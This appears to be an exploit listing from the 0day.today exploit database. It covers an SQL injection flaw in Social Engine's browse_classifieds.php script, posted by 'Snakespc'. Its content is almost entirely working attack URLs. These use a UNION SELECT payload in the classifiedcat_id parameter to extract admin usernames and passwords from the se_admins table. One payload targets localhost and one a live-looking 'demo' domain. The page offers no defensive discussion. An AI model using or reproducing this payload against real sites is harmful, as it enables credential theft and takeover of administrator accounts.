[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Social Engine (browse_classifieds.php s) SQL Injection Vulnerability

Author
Snakespc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4638
Category
web applications
Date add
11-01-2009
Platform
unsorted
=====================================================================
Social Engine (browse_classifieds.php s) SQL Injection Vulnerability
====================================================================


                  ===================================GAZA=============================================

Exploit:
http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
********
demo:
http://www.socialenginedev.com/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
==================================================================================================================



#  0day.today [2024-11-15]  #